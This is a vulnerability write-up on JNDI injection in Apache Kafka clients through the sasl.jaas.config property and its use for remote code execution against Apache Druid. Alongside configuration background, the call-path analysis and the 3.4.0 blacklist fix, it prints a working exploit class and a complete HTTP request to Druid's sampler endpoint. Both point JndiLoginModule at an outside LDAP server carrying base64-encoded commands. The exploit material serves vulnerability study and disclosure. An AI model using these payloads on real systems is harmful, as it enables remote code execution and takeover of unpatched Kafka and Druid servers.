Apache Kafka Clients Jndi Injection
Vulnerability description
Apache Kafka is a distributed data stream processing platform that can publish, subscribe, store and process data streams in real time. Kafka Connect is a tool for scalable, reliable streaming of data between Kafka and other systems. An attacker can use any Kafka client based on SASL JAAS configuration and SASL protocol to achieve remote code execution by constructing special configurations and performing JNDI injection when creating or modifying connectors for Kafka Connect workers.
Scope of influence
2.4.0 <= Apache Kafka <= 3.3.2
Prerequisite knowledge
What is Kafka
Kafka is an open source distributed messaging system. Kafka can handle a large number of messages and data streams and has the characteristics of high throughput, low latency, and scalability. It is widely used in big data fields, such as log collection, data transmission, stream processing and other scenarios.
It feels very similar to RocketMQ, and its main functions are used for data transmission.
Kafka client SASL JAAS configuration
Simple Authentication and Security Layer (SASL) is a framework used for authentication and data encryption in network protocols. It is represented as JAAS in the actual application of Kafka.
Java Authentication and Authorization Service (JAAS) is a Java user-centric security framework that complements Java’s code-centric security. To sum up, it is used for authentication. Interestingly, Shiro (JSecurity) was originally developed because of the many shortcomings of JAAS at that time.
Referenced from https://blog.csdn.net/yinxuep/article/details/103242969 There are also some subtle configurations that will not be expanded upon here. The actual effect of dynamic setting and static modification of .conf
file is the same.
Server configuration
1. The server JASS file is usually configured under the server node. For example, here we name it kafka_server_jaas.conf
, and the content is as follows
KafkaServer { org.apache.kafka.common.security.plain.PlainLoginModule required username="eystar" password="eystar8888" user_eystar="eystar8888" user_yxp="yxp-secret"; };
Description:
username + password represents the authentication information used for communication between brokers in the kafka cluster environment.
user_eystar="eystar8888"
means defining the user information for the client to connect to the agent, that is, creating a user identity information with the user name eystar and password eystar8888, and the kafka agent authenticates it. Create multiple users in the format user_XXX=”XXX”
2. If it is used statically, it needs to be added to the JVM startup parameters, as follows
if [ "x$KAFKA_OPTS" ]; then export KAFKA_OPTS="-Djava.security.auth.login.config=/opt/modules/kafka_2.11-2.0.0/config/kafka_server_jaas.conf" fi
https://kafka.apache.org/documentation/#brokerconfigs_sasl.jaas.config
Client configuration
Basically the same as the server, the following steps
1. Configure the client JAAS file and name it kafka_client_jaas.conf
KafkaClient { org.apache.kafka.common.security.plain.PlainLoginModule required username="eystar" password="eystar8888"; };
2. Specify the configuration properties sasl.jaas.config
when connecting to the Kafka Client called by JAVA.
sasl.jaas.config=org.apache.kafka.common.security.plain.PlainLoginModule required \ username="eystar" \ password="eystar8888"; // That is, configuration properties: (I will talk about it later and it can also be configured dynamically, which reminds me of RocketMQ) Pro.set("sasl.jaas.config","org.apache.kafka.common.security.plain.PlainLoginModule required username="eystar" password="eystar8888"; "; ");
Kafka client dynamically modifies JAAS configuration
Method 1: Configure the Properties attribute. You can notice that the key name of this field is sasl.jaas.config
, and its format is as follows
loginModuleClass controlFlag (optionName=optionValue)*;
The loginModuleClass represents the authentication method, such as LDAP, Kerberos, and Unix authentication. You can refer to the official document https://docs.oracle.com/javase/8/docs/technotes/guides/security/jgss/tutorials/LoginConfigFile.html. There is one The location is JndiLoginModule
, and the JDK’s own loginModule is located at com.sun.security.auth.module
//Safe mode username password props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username="usn" password="pwd\ ";"); props.setProperty("security.protocol", "SASL_PLAINTEXT"); props.setProperty("sasl.mechanism", "PLAIN");
Method 2: Set system property parameters
//Specify kafka_client_jaas.conf file path String confPath = TestKafkaComsumer.class.getResource("/").getPath() + "/kafka_client_jaas.conf"; System.setProperty("java.security.auth.login.config", confPath);
To help you learn about network security, you can receive a complete set of information for free:
① Mind map of cybersecurity learning and growth path
② 60+ classic network security toolkits
③ 100+ SRC analysis report
④ 150+ practical cyber security attack and defense technology e-books
⑤ The most authoritative CISSP certification exam guide + question bank
⑥ Over 1800 pages of CTF practical skills manual
⑦ The latest collection of interview questions from major Internet security companies (including answers)
⑧ APP client security detection guide (Android + IOS)
Implementation code
Consumer
public class TestComsumer {<!-- --> public static void main(String[] args) {<!-- --> Properties props = new Properties(); props.put("bootstrap.servers", "192.168.1.176:9092"); props.put("group.id", "test_group"); props.put("enable.auto.commit", "true"); props.put("auto.commit.interval.ms", "1000"); props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer"); props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer"); // Configuration of sasl.jaas.config props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username="usn" password="pwd\ ";"); props.setProperty("security.protocol", "SASL_PLAINTEXT"); props.setProperty("sasl.mechanism", "PLAIN"); KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props); consumer.subscribe(Arrays.asList("topic_name")); while (true) {<!-- --> try {<!-- --> ConsumerRecords<String, String> records = consumer.poll(Duration .ofMillis(100)); for (ConsumerRecord<String, String> record : records) System.out.printf("offset = %d, partition = %d, key = %s, value = %s%n", record.offset(), record.partition(), record.key(), record.value()); } catch (Exception e) {<!-- --> e.printStackTrace(); } } } }
Producer
public class TestProduce {<!-- --> public static void main(String args[]) {<!-- --> Properties props = new Properties(); props.put("bootstrap.servers", "192.168.1.176:9092"); props.put("acks", "1"); props.put("retries", 3); props.put("batch.size", 16384); props.put("buffer.memory", 33554432); props.put("linger.ms", 10); props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer"); props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer"); //sasl props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username="usn" password="pwd\ ";"); props.setProperty("security.protocol", "SASL_PLAINTEXT"); props.setProperty("sasl.mechanism", "PLAIN"); Producer<String, String> producer = new KafkaProducer<>(props); /** * ProducerRecord parameter analysis The first one: topic_name is the producer topic name, * Second: For producer kafka2.0, you need to specify a key *, in enterprise applications, we generally use it as businessId, such as order ID, user ID, etc. Third: the main information of the message */ try {<!-- --> producer.send(new ProducerRecord<String, String>("topic_name", Integer.toString(i), "message info")); } catch (InterruptedException e) {<!-- --> e.printStackTrace(); } } }
Vulnerability Recurrence
The trigger point of the vulnerability is actually at the com.sun.security.auth.module.JndiLoginModule#attemptAuthentication
method
It is easy to construct EXP by straightening out the logic
import org.apache.kafka.clients.consumer.KafkaConsumer; import org.apache.kafka.clients.producer.KafkaProducer; import java.util.Properties; public class EXP { public static void main(String[] args) throws Exception { Properties properties = new Properties(); properties.put("bootstrap.servers", "127.0.0.1:1234"); properties.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer"); properties.put("value.deserializer","org.apache.kafka.common.serialization.StringDeserializer"); properties.put("sasl.mechanism", "PLAIN"); properties.put("security.protocol", "SASL_SSL"); properties.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule " + "required " + "user.provider.url="ldap://124.222.21.138:1389/Basic/Command/Base64/Q2FsYw==" " + "useFirstPass="true" " + "group.provider.url="xxx";"); KafkaConsumer<String, String> kafkaConsumer = new KafkaConsumer<>(properties); kafkaConsumer.close(); } }
Vulnerability Analysis
There is a lot of data processing and assignment in the front, so I will skip it here and look directly at line 177 of the org.apache.kafka.clients.consumer.KafkaConsumer
class ClientUtils.createChannelBuilder()
, follow up.
Continue to follow up. Here we will first determine whether the SASL mode is turned on. Only if it is turned on will we follow up to the create()
method.
Follow up the create()
method. After completing the judgment on the client and the security protocol, the loadClientContext()
method is called. Follow up and find that some configurations are still loaded. .
Jump out and follow the ((ChannelBuilder)channelBuilder).configure(configs)
method, and finally follow the structure of org.apache.kafka.common.security.authenticator.LoginManager
function.
Follow up the login()
method, here new LoginContext()
, then call the login()
method, follow up
The initialize()
method of JndiLoginModule
will be called here.
After the initialization is completed, the login()
method of JndiLoginModule
is called here, and finally the attemptAuthentication()
method of JndiLoginModule
is called. , complete Jndi injection.
Bug fix
In version 3.4.0, the official fix is to add a blacklist to JndiLoginModule
org.apache.kafka.common.security.JaasContext#throwIfLoginModuleIsNotAllowed
private static void throwIfLoginModuleIsNotAllowed(AppConfigurationEntry appConfigurationEntry) {<!-- --> Set<String> disallowedLoginModuleList = (Set)Arrays.stream(System.getProperty("org.apache.kafka.disallowed.login.modules", "com.sun.security.auth.module.JndiLoginModule"). split(",")).map(String::trim).collect(Collectors.toSet()); String loginModuleName = appConfigurationEntry.getLoginModuleName().trim(); if (disallowedLoginModuleList.contains(loginModuleName)) {<!-- --> throw new IllegalArgumentException(loginModuleName + " is not allowed. Update System property '" + "org.apache.kafka.disallowed.login.modules" + "' to allow " + loginModuleName); } }
Apache Druid RCE via Kafka Clients
Affected versions: Apache Druid <= 25.0.0
Apache Druid is a real-time analytical database that supports importing data (Consumer) from Kafka, because the current version of the kafka-clients
dependency used by the latest version of Apache Druid 25.0.0 is still 3.3.1. That is, the vulnerable version, so if there is unauthorized access to the target Druid (default configuration has no authentication), RCE can be implemented in this way
Interestingly, Druid includes the commons-beanutils:1.9.4
dependency, so even with a higher version of the JDK, you can deserialize the payload through LDAP JNDI to implement RCE.
- Trigger point at the vulnerability UI: Druid Web Console – Load data – Apache Kafka
Here you can load Kafka’s Data, where you can modify the configuration item sasl.jaas.config
to construct the Payload
POST http://124.222.21.138:8888/druid/indexer/v1/sampler?for=connect HTTP/1.1 Host: 124.222.21.138:8888 Content-Length: 916 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.43 Content-Type: application/json Origin: http://124.222.21.138:8888 Referer: http://124.222.21.138:8888/unified-console.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ja;q=0.5,zh-TW;q=0.4, no;q=0.3,ko;q=0.2 Connection: close {"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka" ,"consumerProperties":{"bootstrap.servers":"127.0.0.1:1234", "sasl.mechanism":"SCRAM-SHA-256", "security.protocol":"SASL_SSL", "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://124.222.21.138:1389/Basic/Command/base64/ aWQgPiAvdG1wL3N1Y2Nlc3M=" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx ";" },"topic":"123","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"( [\s\S]*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"] }},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue ":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig": {"type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
You can see the process of instantiating KafkaConsumer in the extension druid-kafka-indexing-service
The addConsumerPropertiesFromConfig()
on line 286 above dynamically changes the configuration.
Apache Druid 26.0.0 updates the version of kafka dependency
https://github.com/apache/druid/blob/26.0.0/pom.xml#L79